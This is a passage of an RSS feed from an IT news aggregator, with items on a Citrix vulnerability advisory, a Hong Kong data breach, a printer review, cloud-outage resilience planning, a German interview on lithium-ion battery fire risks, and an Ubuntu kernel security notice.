<p>These changes are described in <a href="https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX696604" target="_blank" rel="noreferrer noopener">the Citrix advisory</a> along with methods to determine if appliances meet the configuration pre-conditions for exploitation for the other flaws. WatchTowr also published <a href="https://github.com/watchtowrlabs/watchTowr-vs-Netscaler-CVE-2026-8451" target="_blank" rel="noreferrer noopener">a Python detection script for the CVE-2026-8451 vulnerability</a> that allows organizations to quickly test if their appliances are susceptible to the exploit.</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fine firms for data breaches, Hong Kong cybersecurity experts urge]]></title>
<description><![CDATA[Cybersecurity experts have called on authorities to impose fines on firms that suffer data breaches, after the personal information of more than 1 million people linked to a leading Hong Kong appliance distributor was maliciously encrypted.
They made the comments on Friday, a day after the city’s...]]></description>
<link>https://tsecurity.de/de/3643440/it-security-nachrichten/fine-firms-for-data-breaches-hong-kong-cybersecurity-experts-urge/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643440/it-security-nachrichten/fine-firms-for-data-breaches-hong-kong-cybersecurity-experts-urge/</guid>
<pubDate>Fri, 03 Jul 2026 13:53:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cybersecurity experts have called on authorities to impose fines on firms that suffer data breaches, after the personal information of more than 1 million people linked to a leading Hong Kong appliance distributor was maliciously encrypted.
They made the comments on Friday, a day after the city’s privacy watchdog announced it had launched an investigation into the breach, which was initially reported by Shun Hing Group on March 23.
The Office of the Privacy Commissioner for Personal Data said...]]></content:encoded>
</item>
<item>
<title><![CDATA[Xerox C255a review:  I much prefer Xerox’s reboot of Lexmark’s laser printer]]></title>
<description><![CDATA[Xerox is targeting the hybrid workforce with this mid-priced multifunction device.]]></description>
<link>https://tsecurity.de/de/3643406/it-nachrichten/xerox-c255a-review-i-much-prefer-xeroxs-reboot-of-lexmarks-laser-printer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643406/it-nachrichten/xerox-c255a-review-i-much-prefer-xeroxs-reboot-of-lexmarks-laser-printer/</guid>
<pubDate>Fri, 03 Jul 2026 13:32:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Xerox is targeting the hybrid workforce with this mid-priced multifunction device.]]></content:encoded>
</item>
<item>
<title><![CDATA[Don’t waste your next cloud outage]]></title>
<description><![CDATA[In the past year, cloud outages have exposed a hard truth about the modern digital economy: A disruption at one hyperscaler can quickly spread far beyond a single vendor’s platform. Failures in cloud control planes, identity systems, storage layers, and core regions have disrupted business operat...]]></description>
<link>https://tsecurity.de/de/3643145/ai-nachrichten/dont-waste-your-next-cloud-outage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643145/ai-nachrichten/dont-waste-your-next-cloud-outage/</guid>
<pubDate>Fri, 03 Jul 2026 11:33:41 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>In the past year, <a href="https://www.infoworld.com/article/4132902/why-cloud-outages-are-becoming-normal.html" data-type="link" data-id="https://www.infoworld.com/article/4132902/why-cloud-outages-are-becoming-normal.html">cloud outages</a> have exposed a hard truth about the modern digital economy: A disruption at one hyperscaler can quickly spread far beyond a single vendor’s platform. Failures in cloud control planes, <a href="https://www.csoonline.com/article/518296/what-is-iam-identity-and-access-management-explained.html">identity systems</a>, storage layers, and core regions have disrupted business operations, developer workflows, and consumer services worldwide. From Google Cloud’s internetwide disruption to repeated outages at AWS and Microsoft Azure, the pattern is now impossible to ignore. As organizations deepen their dependence on a small number of providers, resilience, redundancy, and contingency planning are becoming strategic necessities rather than purely technical concerns. Just consider this list of recent sizeable outages in the past year alone:</p>



<ul class="wp-block-list">
<li><strong>Google Cloud, June 12, 2025:</strong> Google Cloud suffered a major outage that disrupted its own services and rippled across the internet, affecting platforms including Spotify and other downstream applications.</li>



<li><strong>AWS, October 20, 2025:</strong> AWS experienced a significant outage linked to a network health monitor issue, disrupting businesses worldwide and, once again, underscoring the concentration risk surrounding its US-East-1 region.</li>



<li><strong>Microsoft Azure, October 29, 2025:</strong> Azure’s global outage generated more than 18,000 user reports at its peak. It was tied to a configuration change in Azure Front Door’s global control plane.</li>



<li><strong>Microsoft Azure, February 2–3, 2026:</strong> Azure endured another major outage lasting more than 10 hours after a misconfiguration in Microsoft-managed storage accounts triggered cascading failures across virtual machine operations and managed identities.</li>



<li><strong>AWS, May 2026:</strong> AWS was hit by a serious US-East-1 outage caused by a thermal event and power loss at a Virginia data center, impairing core services including EC2 and EBS.</li>
</ul>



<p>What once seemed exceptional is now a regular occurrence that organizations must accept as part of doing business in the cloud. This normalization of infrastructure-layer failures should concern every technology leader who has been told that the cloud is the reliable, enterprise-grade foundation for their <a href="https://www.cio.com/article/230425/what-is-digital-transformation-a-necessary-disruption.html">digital transformation</a> initiatives.</p>



<h2 class="wp-block-heading">A staggering financial impact</h2>



<p>The financial impact of these outages on enterprises is substantial and often underestimated. When a cloud platform goes down, companies lose revenue in direct proportion to the outage’s duration and their reliance on the affected services. For large enterprises processing millions of transactions per hour, even a two-hour outage can cost tens of millions of dollars in lost revenue. Beyond direct losses, there are reputational damages, customer churn, and the operational costs of <a href="https://www.networkworld.com/article/967679/what-is-disaster-recovery-how-to-ensure-business-continuity.html">incident response</a> and recovery.</p>



<p>When your e-commerce platform goes down during a peak shopping period, you don’t just lose the sales from that two-hour window. You lose customer trust that extends well beyond the outage itself. When your enterprise collaboration tools become unavailable, productivity grinds to a halt across your entire organization. When your data processing pipeline stalls, downstream analytical capabilities that drive critical business decisions are delayed or entirely compromised. The true cost of a cloud outage extends far beyond the immediate period of unavailability.</p>



<h2 class="wp-block-heading">SLAs don’t help much</h2>



<p>Many enterprise tech leaders are frustrated by their limited recourse during outages. Cloud service-level agreements (SLAs) often offer service credits that are far below actual damages. These agreements also usually absolve providers of responsibility for indirect or consequential damages, subject to a cap that rarely reflects the true cost of an outage.</p>



<p>In essence, enterprises are being asked to trust platforms they don’t control with business-critical operations, while accepting terms that provide minimal protection when things go wrong. This fundamentally imbalanced relationship favors the provider at the customer’s expense.</p>



<h2 class="wp-block-heading">Resilient architecture</h2>



<p>This situation demands a fundamental shift in how enterprises approach cloud architecture and infrastructure planning. The days of simply migrating everything to a single hyperscaler and assuming reliability will follow are over. Organizations need to deliberately build resilience into their platforms by embracing architectural approaches that reduce dependence on any single provider or service.</p>



<p>A hybrid architecture that combines cloud-based and on-premises infrastructure enables organizations to shift workloads during outages while maintaining control of critical systems. Similarly, a multicloud strategy that distributes applications and data across multiple providers reduces the blast radius of any single provider’s failure. These approaches, without question, introduce complexity and require more sophisticated management tools and operational expertise. However, the alternative—accepting that your business continuity depends entirely on the reliability of platforms you cannot control—is increasingly untenable.</p>



<p>The challenge is that achieving resilience through heterogeneity introduces management complexity that many organizations are not prepared to handle. Using multiple cloud providers and on-premises infrastructure requires learning different operational models, maintaining diverse skill sets, and managing different tools across your environment. Licensing costs, integration efforts, and ongoing operational overhead are significant.</p>



<p>However, the organizations that invest in this complexity will be better positioned to maintain business continuity when the next major cloud failure inevitably occurs. The question is not whether you can afford to invest in resilience, but whether you can afford not to.</p>



<h2 class="wp-block-heading">Three things to do now</h2>



<p>The practical reality is that organizations cannot simply wait for cloud providers to solve this problem. The economics of the industry make it unlikely that service-level agreements will become significantly more favorable to customers. The complexity of modern cloud infrastructure means that outages will continue to occur regardless of the investments providers make in reliability. Therefore, enterprises must take responsibility for their own resilience.</p>



<p>Here are the three things enterprises should be doing right now:</p>



<p><strong>First, enterprises should conduct a comprehensive audit</strong> of their cloud dependencies to identify single points of failure across their architecture. This means mapping every application, data store, and integration point to determine exactly what would happen if a specific cloud service went offline. Most organizations discover they have far more dependencies on a single provider than they realized, and many of those dependencies are undocumented. An audit will serve as the foundation for a deliberate resilience strategy that prioritizes redundancy for the most critical systems. </p>



<p><strong>Second, enterprises should implement a hybrid architecture</strong> that incorporates on-premises infrastructure for their most critical workloads. Mission-critical systems must have an alternative path to operation when cloud services fail. The key is to identify which systems truly require this level of protection and which can tolerate cloud-only deployment. A phased approach that starts with the most sensitive workloads and expands over time allows organizations to build expertise with <a href="https://www.networkworld.com/article/964498/what-is-hybrid-cloud-computing.html">hybrid systems</a> and refine their processes as they go.</p>



<p><strong>Third, enterprises must establish formal disaster-recovery testing procedures</strong> that specifically target cloud provider outages rather than traditional site failures. Most organizations test their disaster recovery capabilities against scenarios such as a data center failure or a natural disaster, but they rarely test what happens when a cloud API becomes unresponsive or a cloud region goes dark. Regular testing of these scenarios will expose gaps in the architecture that might otherwise remain hidden until an actual outage occurs.</p>



<p>Here’s the bottom line: Don’t put all your eggs in a single basket. Accept that cloud platforms will continue to fail, and plan your architecture accordingly. The investment in resilience will pay for itself the next time your primary cloud provider experiences an outage. Your competitors will be scrambling while your business continues to operate.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tickende Bombe in der Schublade: Wie gefährlich sind alte Akkus? Das sagt die Feuerwehr!]]></title>
<description><![CDATA[Beim Institut für Schadenverhütung (IFS) werden Brände durch Lithium-Ionen-Akkus inzwischen als eigenes Schadenbild erfasst – mit steigenden Fallzahlen. Gleichzeitig lagern in deutschen Haushalten Millionen Smartphones, Tablets, Spielzeuge oder Werkzeuge aus den ersten Jahren des Smartphone-Booms...]]></description>
<link>https://tsecurity.de/de/3643020/it-nachrichten/tickende-bombe-in-der-schublade-wie-gefaehrlich-sind-alte-akkus-das-sagt-die-feuerwehr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643020/it-nachrichten/tickende-bombe-in-der-schublade-wie-gefaehrlich-sind-alte-akkus-das-sagt-die-feuerwehr/</guid>
<pubDate>Fri, 03 Jul 2026 10:33:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Beim <a href="https://www.ifs-ev.org/schadenverhuetung/feuerschaeden/lithium-ionen-akkus/" target="_blank" rel="noreferrer noopener">Institut für Schadenverhütung (IFS)</a> werden Brände durch Lithium-Ionen-Akkus inzwischen als eigenes Schadenbild erfasst – <a href="https://www.ifs-ev.org/schadenverhuetung/feuerschaeden/lithium-ionen-akkus/" target="_blank" rel="noreferrer noopener">mit steigenden Fallzahlen</a>. Gleichzeitig lagern in deutschen Haushalten Millionen Smartphones, Tablets, Spielzeuge oder Werkzeuge aus den ersten Jahren des Smartphone-Booms. </p>



<p>Viele dieser Geräte verschwinden nach ihrer aktiven Nutzung nicht im Recycling, sondern bleiben jahrelang in Schubladen, Kellern oder auf Dachböden liegen. Doch welche Gefahr geht von diesen gealterten Akkus tatsächlich aus?</p>



<p>Wir wollten wissen, wie die Feuerwehr das Risiko einschätzt. Dafür haben wir mit einem Experten gesprochen, der sich beruflich intensiv mit solchen Gefahren beschäftigt: <strong>Christian Emrich, Amtsleiter des Amtes für Brand- und Katastrophenschutz Freiburg </strong>und Leiter der bundesweiten Arbeitsgruppe „Li-Ionen-Speichermedien“. </p>



<p>Im exklusiven PC-WELT-Interview erklärt er, warum alte Handys zu den unterschätzten Gefahrenquellen des Alltags gehören und wie man im Ernstfall richtig reagiert. Um seine Warnungen einzuordnen, lohnt sich zunächst ein kurzer Blick ins physikalische Innenleben eines Lithium-Ionen-Akkus.</p>



<h2 class="wp-block-heading">Chemie gegen die Zeit: Warum Akkus manchmal durchgehen</h2>



<p>In den meisten Smartphones stecken sogenannte Pouch-Zellen – benannt nach ihrer flexiblen, beutelartigen Form. Statt eines stabilen Metallgehäuses besitzen sie nur eine flexible Hülle aus beschichteter Aluminiumfolie. Mit den Jahren, durch Tiefenentladung oder winzige Vorschäden, verändert sich die Chemie im Inneren. Der Akku gast aus und bläht sich auf – die berühmten dicken Backen entstehen.</p>



<p>Im Lebenslauf des Energiespeichers ist das eine kritische Phase. Versagt die dünne Trennschicht (der Separator) zwischen den Polen, kann es zum internen Kurzschluss kommen. Die Folge ist das gefürchtete thermische Durchgehen, der Thermal Runaway. </p>



<p>Das Heimtückische daran: Bei den extremen Temperaturen, die dabei im Inneren entstehen können, zerfallen die Materialien und setzen neben brennbaren Gasen auch Sauerstoff frei. Der Akku füttert sein eigenes Feuer also von innen heraus, weshalb diese Brände manchmal schwer zu löschen sind. Schon Temperaturen ab 60 °C (die im Sommer auf dem Dachboden oder im Auto erreicht werden können) gelten laut vielen Herstellern als kritischer Bereich, weil sie den Akku dauerhaft schädigen und damit das Risiko späterer Defekte erhöhen können.</p>



<p><strong>Wie schätzt die Feuerwehr die Lage ein? Hier ist unser Gespräch:</strong></p>



<h2 class="wp-block-heading">„Sobald Rauch austritt, muss man den Raum verlassen!“ – Amtsleiter Christian Emrich im Interview</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a477397a8579"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Christian-Emrich-Portrait-3.jpg?quality=50&amp;strip=all&amp;w=816" alt="Amtsleiter Christian Emrich Portrait" class="wp-image-3178037" width="816" height="1200" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">©Emrich</p></div>



<p>Alte Handys, Tablets oder Laptops landen oft jahrelang in Schubladen und Schränken. Doch welche Risiken gehen von gealterten Lithium-Ionen-Akkus tatsächlich aus? Darüber haben wir mit einem Experten gesprochen, der sich seit Jahren intensiv mit den Gefahren von Energiespeichern und den Herausforderungen für die Feuerwehren beschäftigt.</p>



<p><strong>Zur Person:</strong> Christian Emrich ist <strong>Amtsleiter des Amtes für Brand- und Katastrophenschutz Freiburg.</strong> Zudem leitet er die Arbeitsgruppe „Li-Ionen-Speichermedien“ der <a href="https://www.agbf.de/" target="_blank" rel="noreferrer noopener">Arbeitsgemeinschaft der Berufsfeuerwehren (AGBF)</a> und des <a href="https://www.feuerwehrverband.de/" target="_blank" rel="noreferrer noopener">Deutschen Feuerwehrverbandes (DFV)</a>. In dieser Funktion beschäftigt er sich seit vielen Jahren mit Lithium-Ionen-Akkus, deren Risiken und den entsprechenden Einsatzkonzepten der Feuerwehren.</p>



<p><strong>PC-WELT: Herr Emrich, könnten Sie uns verraten, wie oft Sie in Ihrer Laufbahn schon mit Einsätzen durch Lithium-Ionen-Akkus zu tun hatten?</strong></p>



<p><strong>Christian Emrich:</strong> Durch meine langjährige Arbeit bei der Berufsfeuerwehr und als Leiter der Arbeitsgruppe „Li-Ionen-Speichermedien“ beschäftige ich mich schon seit vielen Jahren intensiv mit den Risiken dieser Technologie. Entsprechend häufig haben wir es im Feuerwehralltag inzwischen mit Einsatzlagen zu tun, bei denen solche Energiespeicher eine Rolle spielen.</p>



<p><strong>Wie gefährlich sind denn diese alten Akkus in unseren Schubladen wirklich? Alte Handys, Tablets, Laptops oder Taschenlampen – ist das ein statistisches Randphänomen oder ein echtes Risiko?</strong></p>



<p><strong>Emrich:</strong> Noch sehen wir keine besonders hohen Fallzahlen, weil die große Welle alter Lithium-Ionen-Akkus erst jetzt entsteht. Viele Geräte erreichen inzwischen ein Alter von zehn Jahren oder mehr. Genau deshalb lautet meine dringende Empfehlung: konsequent ausmisten. Auch wenn es schwerfällt, sich von alten Geräten zu trennen.</p>



<p>Das sind schlummernde Brandrisiken in unseren Wohnungen. Was in den 1970er-Jahren die vergessene Kaffeemaschine war, ist heute die mobile Elektronik und die Akkus in Altgeräten.</p>



<p><strong>Stichwort „Thermal Runaway“: Was passiert da im Inneren eines Akkus eigentlich physikalisch, wenn er hochgeht – und warum ist der Rauch dabei so viel tückischer als bei einem normalen Zimmerbrand?</strong></p>



<p><strong>Emrich:</strong> Der sogenannte Thermal Runaway ist das explosionsartige Abbrennen der Akkuzellen. Ein Akku besteht meist aus mehreren einzelnen Zellen. Werden diese durch mechanische Einwirkungen, Hitze, elektrische Fehler oder andere Vorschädigungen belastet, kann es zu einer unkontrollierten Energiefreisetzung kommen.</p>



<p>Oft beginnt das mit einem Aufblähen des Akkus. Beim eigentlichen Thermal Runaway kommt es dann zu schussartigen Explosionen. Das kann unabhängig davon passieren, ob der Akku in einem Smartphone, einem Spielzeug oder einem anderen Gerät verbaut ist. Die Energie überträgt sich dabei blitzartig von Zelle zu Zelle.</p>



<p>Der Rauch, der dabei entsteht, ist gesundheitsschädlich und sollte keinesfalls eingeatmet werden. Das gilt zwar grundsätzlich auch für viele andere Kunststoffbrände, aber der Geruch ist oft etwas anders, teilweise leicht süßlich oder aromatisch. Sobald Rauch austritt, sollte man den Raum sofort verlassen und die Feuerwehr alarmieren.</p>



<p><strong>Zum Thema Warnsignale und „dicke Backen“: Alte Geräte oder Akkus können sich verformen. Ab wann genau wird das kritisch?</strong></p>



<p><strong>Emrich:</strong> Das Aufblähen ist bereits die sensible Phase. Es zeigt unmissverständlich, dass der Akku ein gewisses Alter oder einen erheblichen Verschleiß aufweist. Viele Menschen kennen das von älteren Smartphones, die im Bereich des Akkus plötzlich dicker werden. Dann steigt das Risiko deutlich. Wenn zusätzlich ein Defekt am Ladegerät vorliegt, starke Wärme hinzukommt oder das Gerät erneut herunterfällt, kann es zum Abrauchen oder zu einem Thermal Runaway kommen.</p>



<p>Solche Verformungen sind klare Anzeichen dafür, dass der Akku möglichst zeitnah über den Fachhandel oder eine geeignete Sammelstelle entsorgt werden sollte. Für Verbraucher gilt ganz klar: Niemals in den Hausmüll werfen!</p>



<p><strong>Wenn ich mein altes Lieblings-Handy als Erinnerungsstück für die nächsten Jahrzehnte aufheben möchte: Darf der Akku im Gerät bleiben oder muss er zwingend ausgebaut werden?</strong></p>



<p><strong>Emrich:</strong> Theoretisch darf der Akku im Gerät bleiben. Ich empfehle jedoch, ihn nach Möglichkeit auszubauen und fachgerecht zu entsorgen. Allein schon deshalb, weil die enthaltenen Rohstoffe wieder in den Wertstoffkreislauf zurückgeführt werden können. Die Recyclingverfahren haben sich in den vergangenen Jahren verbessert und werden in Zukunft weiter an Effizienz gewinnen. Ungenutzte Rohstoffe in einer Schublade helfen letztlich niemandem.</p>



<p><strong>Wenn der Akku fest verbaut ist: Wie lagere ich das Gerät am sichersten und spielt der Ladestand eine Rolle?</strong></p>



<p><strong>Emrich:</strong> Der Ladestand spielt für die Brandgefahr im Ruhezustand nur eine untergeordnete Rolle. Wichtiger ist, dass das Gerät so gelagert wird, dass kein Wärmestau entstehen kann. Außerdem sollte man nur geeignete und überprüfte Ladegeräte verwenden. Das reduziert die Brandrisiken beim Laden erheblich und schont gleichzeitig den Akku. Für die Lagerung empfehle ich eine nicht brennbare Unterlage. Geräte sollten nicht auf Sofas, Sesseln oder anderen leicht entzündlichen Oberflächen abgelegt werden.</p>



<p><strong>Gibt es Geräte, bei denen die Menschen oft völlig vergessen, dass ein potenziell gefährlicher Akku verbaut ist?</strong></p>



<p><strong>Emrich:</strong> Auf jeden Fall. Wir nehmen es heute als selbstverständlich wahr, dass nahezu alles mobil funktioniert und eine eigene Stromversorgung besitzt. Dadurch vergisst man schnell: Da ist ja immer noch etwas drin, was potenziell einen Brand verursachen kann.</p>



<p>Dabei gibt es keine Gerätekategorie, die grundsätzlich ungefährlicher wäre als eine andere. Entscheidend ist vielmehr, wie mit dem Akku umgegangen wird. Ist das Gerät häufig heruntergefallen? Wird ein ungeeignetes Ladegerät verwendet? Gibt es Vorschäden im Inneren?</p>



<p>Mein Rat lautet deshalb: Nach Möglichkeit das Original-Ladegerät oder qualitativ hochwertige Produkte mit entsprechender CE-Kennzeichnung verwenden. Gerade bei Produkten unbekannter Herkunft kann die Qualität der verbauten Akkus ein Risikofaktor sein.</p>



<p><strong>Was halten Sie von speziellen Hilfsmitteln wie LiPo-Bags oder Löschdecken für Kleingeräte oder sogar E-Roller – sind diese für Privathaushalte sinnvoll?</strong></p>



<p><strong>Emrich:</strong> Solche Hilfsmittel können in der Frühphase eines Vorfalls durchaus sinnvoll sein. Das Wichtigste bleibt aber immer der Schutz von Menschenleben. Sobald Rauch vorhanden ist, muss man den Raum verlassen. Dann sollten andere Personen gewarnt, die Feuerwehr alarmiert und keine weiteren Löschversuche unternommen werden. Löschdecken oder Brandschutztaschen können helfen – aber nur so lange, wie noch keine starke Rauchentwicklung eingesetzt hat.</p>



<p><strong>Stimmt es, dass man Lithium-Brände niemals mit Wasser löschen soll? Wie löscht man solche Brände im Haushalt am besten?</strong></p>



<p><strong>Emrich:</strong> Das stimmt so pauschal nicht. Wasser kühlt sehr gut und kann die Reaktionen im Akku verlangsamen oder eindämmen. Sobald jedoch Rauch austritt oder sich der Brand entwickelt, handelt es sich nicht mehr um eine Aufgabe für Laien. Dann sollte die Feuerwehr übernehmen. Die dabei entstehenden Gase können gefährlich sein und erfordern entsprechende Schutzmaßnahmen. Übrigens: Wasser ist das Lösch- und Kühlmittel der Wahl bei Akkubränden für uns Einsatzkräfte der Feuerwehr.</p>



<p><strong>Was war denn der kurioseste Ort oder das seltsamste Gerät, bei dem Sie einen Akkubrand gelöscht haben?</strong></p>



<p><strong>Emrich:</strong> Besonders spannend war für uns die Entwicklung im Bereich von Spielzeug und günstigen Elektronikprodukten. Gerade in den ersten Jahren haben wir dort immer wieder Probleme mit minderwertigen Akkus gesehen. In Schulungen und Untersuchungen haben wir zahlreiche Szenarien durchgespielt. Dabei zeigte sich, dass nicht zertifizierte oder qualitativ minderwertige Produkte deutlich schneller überhitzen können. Teilweise genügte schon ein blockierter Propeller in einem Billigspielzeug-Flugzeug, um einen kritischen Zustand herbeizuführen.</p>



<p><strong>Angenommen, es fängt in der Schublade plötzlich an zu zischen und zu qualmen: Was ist die absolut wichtigste Maßnahme, die man selbst ergreifen kann, bevor man die 112 wählt?</strong></p>



<p><strong>Emrich:</strong> Sofort den Raum verlassen und Türen schließen. Anschließend andere Bewohner warnen und sicherstellen, dass insbesondere Personen mit eingeschränkter Mobilität das Gebäude verlassen können. Sobald alle in Sicherheit sind, sollte die Feuerwehr über die 112 alarmiert werden. Eigene Maßnahmen sind nur sinnvoll, solange noch keine Rauchentwicklung eingesetzt hat.</p>



<p><strong>Zum Abschluss: Was ist der wichtigste Rat, den Sie allen Sammlern und Technik-Fans für den Umgang mit alten Akkus mitgeben möchten?</strong></p>



<p><strong>Emrich:</strong> Achten Sie auf eine ordentliche Lagerung bei stabilen Temperaturen, möglichst Zimmertemperatur. Vermeiden Sie Bereiche mit starker Sonneneinstrahlung oder großer Hitze. Ab etwa 80 Grad Celsius wird die Situation kritisch. Hohe Temperaturen können einen Thermal Runaway begünstigen. Deshalb gilt: Alte Akkus regelmäßig kontrollieren, beschädigte oder aufgeblähte Exemplare umgehend fachgerecht entsorgen und keine unnötigen Risiken eingehen!</p>



<hr class="wp-block-separator has-text-color has-vivid-red-color has-alpha-channel-opacity has-vivid-red-background-color has-background">



<h2 class="wp-block-heading">ℹ️ Konkrete Tipps für Sammler</h2>



<p>Die wichtigsten Empfehlungen aus dem Gespräch sowie die Hinweise von Feuerwehr und Fachorganisationen haben wir noch einmal zusammengefasst. Wer seine alten Lieblingsgeräte für die nächsten Jahrzehnte im privaten Museum oder der Vitrine erhalten möchte, sollte die Ratschläge der Experten von IFS, DGUV und Feuerwehr beherzigen:</p>



<div class="wp-block-idg-base-theme-box-text inline-box">
<ul class="wp-block-list">
<li><strong>Akku raus! (Sicherste Variante):</strong> Wenn ein Gerät rein als optisches Erinnerungsstück aufgehoben werden soll, bauen Sie den Akku nach Möglichkeit komplett aus und entsorgen Sie ihn fachgerecht im Handel. Ohne Akku entfällt die Brandgefahr durch den Energiespeicher komplett.</li>



<li><strong>Kontakte sichern:</strong> Falls Sie lose Akkus aufbewahren, kleben Sie die freiliegenden Kontakte (Pole) unbedingt mit Isolierband ab. Fliegen die Akkus lose in einer Schublade herum, kann eine einfache Büroklammer oder der Kontakt mit einem anderen Akku einen fatalen externen Kurzschluss auslösen.</li>



<li><strong>Frost-Falle meiden:</strong> Lagern Sie alte Elektronik niemals in der ungeheizten Garage oder im feuchten Schuppen. Dauerhafter Frost unter -10 °C beschädigt die Elektrolyt-Flüssigkeit im Inneren irreversibel. Das böse Erwachen droht dann beim nächsten Ladeversuch.</li>



<li><strong>Die richtige Unterlage:</strong> Handys im Ruhestand gehören nicht auf das Sofa, den Sessel oder in die Nähe von Gardinen. Lagern Sie die Geräte auf einer nicht brennbaren Unterlage (z. B. Glas, Fliesen oder in Metallboxen) und setzen Sie sie niemals direkter Sonneneinstrahlung aus.</li>



<li><strong>Regelmäßige Inspektion:</strong> Machen Sie regelmäßig einen “Schubladen-Check”. Nehmen Sie die Geräte mindestens einmal im Jahr in die Hand. Sobald sich das Gehäuse wölbt, das Display aus dem Rahmen gedrückt wird oder der Akku sich schwammig anfühlt, besteht akuter Handlungsbedarf: Das Gerät muss sofort und konsequent zum Wertstoffhof oder in den Fachhandel gebracht werden.</li>
</ul>
</div>



<h2 class="wp-block-heading"><strong>Fazit</strong></h2>



<p>Alte Lithium-Ionen-Akkus sind längst kein Randphänomen mehr: In vielen Haushalten wächst die Zahl älterer Geräte mit diesen Energiespeichern. Wer alte Technik liebt und sammelt, sollte deshalb verantwortungsvoll mit den potenziellen Risiken umgehen. Die sicherste Lösung für ein privates Technikmuseum ist der Ausbau des Energiespeichers. Wie Feuerwehr-Chef Christian Emrich im Interview treffend sagt: Ungenutzte Rohstoffe in einer Schublade helfen niemandem – sie können im schlimmsten Fall aber das eigene Zuhause gefährden.</p>



<p>Wer einen Akku nicht ausbauen kann oder möchte, sollte bei der Lagerung zumindest auf stabile Zimmertemperaturen, Brandschutz und regelmäßige Kontrollen achten.</p>



<p><strong>Lesen Sie weiter zum Thema:</strong></p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3070961/so-laden-sie-smartphone-und-e-bike-jetzt-sicher-akku-brand-vermeiden.html" target="_blank" rel="noreferrer noopener">So laden Sie Smartphone und E-Bike sicher auf</a></li>



<li><a href="https://www.pcwelt.de/article/1203507/ist-handy-schnellladen-schaedlich-fuer-den-akku-unsere-eindeutige-antwort.html" target="_blank" rel="noreferrer noopener">Ist Schnellladen schädlich für den Handy-Akku? Die Antwort</a></li>



<li><a href="https://www.pcwelt.de/article/3060569/akku-ladefehler-brandgefahr-vermeiden.html" target="_blank" rel="noreferrer noopener">Machen Sie bloß nicht diese tödlichen Akku-Fehler</a></li>



<li><a href="https://www.pcwelt.de/article/2590103/akku-brennt-richtig-handeln-und-loeschen.html" target="_blank" rel="noreferrer noopener">Akku brennt – so reagieren Sie richtig</a></li>



<li><a href="https://www.pcwelt.de/article/1194630/handy-laden-in-der-nacht-diese-fehler-vermeiden.html" target="_blank" rel="noreferrer noopener">Handy laden über Nacht: Diese Fehler besser vermeiden</a></li>
</ul>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cyberattack on Hong Kong’s Shun Hing Group affects data of 1 million people]]></title>
<description><![CDATA[A cyberattack on leading Hong Kong appliance distributor Shun Hing Group has compromised the personal information of more than 1 million people, according to the city’s privacy watchdog.
The Office of the Privacy Commissioner for Personal Data said on Thursday that it had launched an investigatio...]]></description>
<link>https://tsecurity.de/de/3641674/it-security-nachrichten/cyberattack-on-hong-kongs-shun-hing-group-affects-data-of-1-million-people/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641674/it-security-nachrichten/cyberattack-on-hong-kongs-shun-hing-group-affects-data-of-1-million-people/</guid>
<pubDate>Thu, 02 Jul 2026 18:24:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A cyberattack on leading Hong Kong appliance distributor Shun Hing Group has compromised the personal information of more than 1 million people, according to the city’s privacy watchdog.
The Office of the Privacy Commissioner for Personal Data said on Thursday that it had launched an investigation into the incident after receiving a data breach report from Shun Hing Group on March 23.
The latest information provided by the company suggested that the personal data of as many as 1.05 million...]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8488-2: Linux kernel (Raspberry Pi) vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

Several security issues were discovered in the Linux kernel.
An attacker could...]]></description>
